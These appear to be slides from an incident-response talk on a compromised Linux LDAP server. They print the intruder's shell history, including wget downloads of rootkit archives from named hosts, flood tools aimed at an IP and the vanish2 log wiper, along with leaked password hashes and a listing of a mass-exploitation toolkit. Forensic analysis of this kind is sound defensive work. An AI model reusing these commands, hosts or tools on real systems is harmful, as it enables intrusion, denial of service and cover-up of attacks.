11. ident:x:98:98:pident user:/:/bin/false rpc:x:32:32:Portmapper RPC user:/:/bin/false rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false admin:x:500:4::/home/admin:/bin/bash kid:x:2764:2764::/:/bin/bash ra:x:0:0::/:/bin/bash hacker:x:2765:2765::/var/hacker:/bin/bash more accounts follow, deleted by anand to shorten the presentation And an extract from /etc/groups: kid:$1$WlLTPQXq$tzU2usdhCMG3KQKAm4JKI0:11776:0:99999:7:::134538460 ra::10865:0:99999:7:::134538460 hacker:$1$L8/uol5e$FqL63oc0Z.s8K0WQkmdvK1:11786:0:99999:7::: [root@ldap2 log]#
12. [anand@anand anand]$ ftp 1.2.3.1 Connected to1.2.3.1 . 220 ldap1 FTP server (Version wu-2.6.2(2) Sat Dec 22 15:48:35 EET 2001) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS. KERBEROS_V4 rejected as an authentication type [anand@anand anand]$ ftp 1.2.3.2 Connected to 1.2.3.2. 220 ldap2 FTP server (Version wu-2.6.1-16) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS. KERBEROS_V4 rejected as an authentication type Name (1.2.3.2:anand): ra 331 Password required for ra. Password: 230 User ra logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 227 Entering Passive Mode (1,2,3,2,138,61) 150 Opening ASCII mode data connection for directory listing. total 240 drwxr-xr-x 2 root root 2048 Jun 10 07:02 bin drwxr-xr-x 3 root root 1024 Sep 13 2001 boot ....
16. [root@ldap1 /tmp]# ls -la /tmp total 9 drwxrwxrwt 9 root root 1024 Jun 24 10:48 . drwxr-xr-x 3 501 ftp 1024 Jun 17 03:41 ., [root@ldap2 mail]# cat /var/hacker/ .bash_history .bash_profile .emacs .screenrc Mail m.tgz .bash_logout .bashrc .kde Desktop a [root@ldap2 mail]# cat /var/hacker/ [root@ldap2 myrk]# cat ./ .1addr linsniffer ps ssh_random_seed tcp.log .1file lpd pwd sshd utils .1proc ls sense sshd_config wipe hideps netstat ssh_host_key string install new-host ssh_host_key.pub sysinfo Notes: The directory ".," (dot-comma) created by the intruder. Linsniffer stores the log in a file called tcp.log I had to use “cat <tab>” since “ls” was trojaned, and would not list anything at all!
17. bnc 8214 hacker cwd DIR 72,7 0 10082 /var/hacker/bnc2.6.4 (deleted) bnc 8214 hacker rtd DIR 72,8 1024 2 / bnc 8214 hacker txt REG 72,7 25784 10111 /var/hacker/bnc2.6.4/bnc (deleted) bnc 8214 hacker mem REG 72,8 471781 44354 /lib/ld-2.2.2.so bnc 8214 hacker mem REG 72,8 445289 44372 /lib/libnsl-2.2.2.so bnc 8214 hacker mem REG 72,8 274054 44401 /lib/libresolv-2.2.2.so bnc 8214 hacker mem REG 72,8 95362 44365 /lib/libcrypt-2.2.2.so bnc 8214 hacker mem REG 72,8 5634864 4035 /lib/i686/libc-2.2.2.so bnc 8214 hacker 0u CHR 136,0 2 /dev/pts/0 bnc 8214 hacker 1u CHR 136,0 2 /dev/pts/0 bnc 8214 hacker 2u CHR 136,0 2 /dev/pts/0 bnc 8214 hacker 3u IPv4 272344 TCP *:12300 (LISTEN Note: Look at this block copied from LSOF: He has installed/started IRC bouncer (bnc) and deleted the files. Other such processes were: sysd, running in place of sshd, a fake nfsd ( what was that meant for? )
18. Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:389 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:6010 0.0.0.0:* LISTEN tcp 1 0 1.2.3.1:21 62.211.226.191:51221 CLOSE_WAIT tcp 0 48 1.2.3.1:22 mylaptop:40657 ESTABLISHED tcp 0 0 1.2.3.1:389 another_legitserver:4746 ESTABLISHED [root@ldap1 /root]# Note: With my version of netstat The FTP connection just hangs, since firewall is blocking outgoing FTP, See the IP 62.x.x.x in Foreign Address column?
19. [root@ldap2 myrk]#tail /etc -n 10 /etc/rc.d/rc.sysinit dmesg > /var/log/dmesg sleep 1 kill -TERM `/sbin/pidof getkey` >/dev/null 2>&1 } & if [ "$PROMPT" != "no" ]; then /sbin/getkey i && touch /var/run/confirm fi wait nfsd -q -p 54789 This is not a real NFS daemon! It listens for commands of some sort, though I could not figure out what exactly it was meant for
20. [root@ldap2 myrk]# cat /var/hacker/.bash_history~ wget http://www.angelfire.com/yt3/nblio/black.tar.gz;rm -r black.tar.gz exec ./a 8245 wget http://www.angelfire.com/yt3/nblio/black.tar.gz;rm -r black.tar.gz ls rm -r m2.tar.gz perl udp.pl 62.0.115.207 0 0 rm -r a.c ls gcc -o p packit.c ls ./p 62.0.115.207 0 ./p 62.0.115.207 0 ls bash_history was fine, shows only legit traffic. I found a bash_history~ (created by vi or did he copy?) that shows intruder activity!
21. rm -r packit.c rm -r udp.pl rm -r p tar xvfz bnc2.6.4.tar.gz;cd bnc2.6.4;./configure;make;./bncsetup ./bncsetup ./bnc ./bnc ./bnc ./bnc killall -9 bnc ./bnc pico bnc.conf cd .. ls rm -r bnc2.6.4 rm -r bnc2.6.4.tar.gz gcc -o a a.c;rm -r a.c;./a ls ./a ./a 1.2.3
22. ls rm -r a gcc -o a a.c;rm -r a.c;./a wget http://download.microsoft.com/download/win2000pro/Update/8.1/NT5/EN-US/DX81NTeng.exe;rm -r DX81NTeng.exe wget http://download.microsoft.com/download/win2000pro/Update/8.1/NT5/EN-US/DX81NTeng.exe;rm -r DX81NTeng.exe ls;w;ls wget http://download.microsoft.com/download/win2000pro/Update/8.1/NT5/EN-US/DX81NTeng.exe;rm -r DX81NTeng.exe ls;w wget http://home.dal.net/oc248/m.tgz Note: Why download DirectX from MS? What was he trying to do? There is nothing at home.dal.net now.
23. wget http://www.angelfire.com/yt3/nblio/black.tar.gz;rm -r black.tar.gz exec ./a 12355 exec ./a 12373 cd myrk; pico install; cd myrk ./install ./a wget http://home.dal.net/oc248/m.tgz ls tar xvfz m.tgz ./a exec ./a 20689 cd myrk pico install cd .. ./a mutt;exit [root@ldap2 myrk]# Note: The file black.tar.gz is still available at angelfire. Go get it if you want to analyse further.
24. 269 ipconfig 270 ifconfig 271 exirt 272 exit 273 cd costy 274 ls 275 id 276 cd logdel/ 277 export blah=freekevin 278 ./vanish2 sysd ti221110a080-0520.bb.online.no 80.213.2.8 279 cd /home/ 280 ls 281 cd TTX/ 282 ls; cd .. 284 cd admin/ 285 ls 286 cd Desktop/
25. 304 cd root/ 305 ls 306 last 307 cd /tmp/., 308 ls 309 rm -rf chmrk-0.3.tgz 310 cd ., 311 ls 312 cd /etc/ 313 cat passwd 314 who 314 who 315 pico passwd 316 export TERM=vt100 317 pico passwd 318 pico shadow 319 cd /var/tmp 320 mkdir ., 321 cd ., 322 ls 323 wget www.geocities.com/freeaxcess/chmrk-0.9.tgz
26. 324 wget www.geocities.com/freeaxcess/chmrk-0.9.tgz 325 ping www.geocities.com 326 cd /tmp/., 327 la; ls ; cd ., ; ls 331 alias ls="ls --color=always" 332 ls -la 333 cd logdel 334 ls 335 ./vanish2 336 expotr blah=768 337 export blah=768 338 ls 339 ./vanish2 340 export blah768=freekevin 341 ./vanish2 342 ./vanish2 sysd crionized.net 217.8.139.50 VANISH2 is used to erase any traces left behind (syslogs, utmp, wtmp etc)
27.
28.
29.
30. File Details: [anand@aries massrooter]$ ls 1* lpd.conf packet.pl s* ssh/ wum.c ybsd* YRH* bind/ Makefile portscan.c scan* targets wus* YBSD* YRH.c brute* p* pscan.c scan.conf targets.txt wus.c YBSD.c ftpd/ packet* r00t* sec* wu* xinetd* ylpd* lpd/ packet.c rpc/ src/ wum* xinetd.c ylpd.c [anand@aries massrooter]$ Notes: wum, wus, ftpd/ contain FTP exploits similar comments for lpd bind rpc etc., packet.pl is a DoS tool r00t is a script that runs the attacks against the selected hosts